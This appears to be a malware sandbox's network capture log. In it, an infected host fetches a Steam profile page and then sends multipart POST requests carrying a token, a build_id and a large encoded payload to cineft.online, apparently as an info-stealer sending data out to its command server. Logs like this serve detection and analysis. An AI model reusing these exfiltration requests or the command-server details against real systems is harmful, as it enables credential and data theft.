2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e Data Ascii: ction(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.n
2024-12-14 22:59:46 UTC	1390	IN	Data Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53 Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a\|\|_.la});ma("S

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	50113	104.102.49.254	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:46 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 22:59:47 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 22:59:47 GMT Content-Length: 25665 Connection: close Set-Cookie: sessionid=bd19f3f6d03c331f60924679; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 22:59:47 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 22:59:47 UTC	11186	IN	Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	50124	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:48 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----47GV3E3OP8YU37G4WBA1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 505 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:48 UTC	505	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 37 47 56 33 45 33 4f 50 38 59 55 33 37 47 34 57 42 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 56 33 45 33 4f 50 38 59 55 33 37 47 34 57 42 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 34 37 47 56 33 45 33 4f 50 38 59 55 33 37 47 34 57 42 41 31 0d 0a 43 6f 6e 74 Data Ascii: ------47GV3E3OP8YU37G4WBA1Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------47GV3E3OP8YU37G4WBA1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------47GV3E3OP8YU37G4WBA1Cont
2024-12-14 22:59:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	50132	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:49 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----I58QQIWLXBIM7Y5P8Q9R User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 213453 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 Data Ascii: ------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------I58QQIWLXBIM7Y5P8Q9RCont
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44 Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:49 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 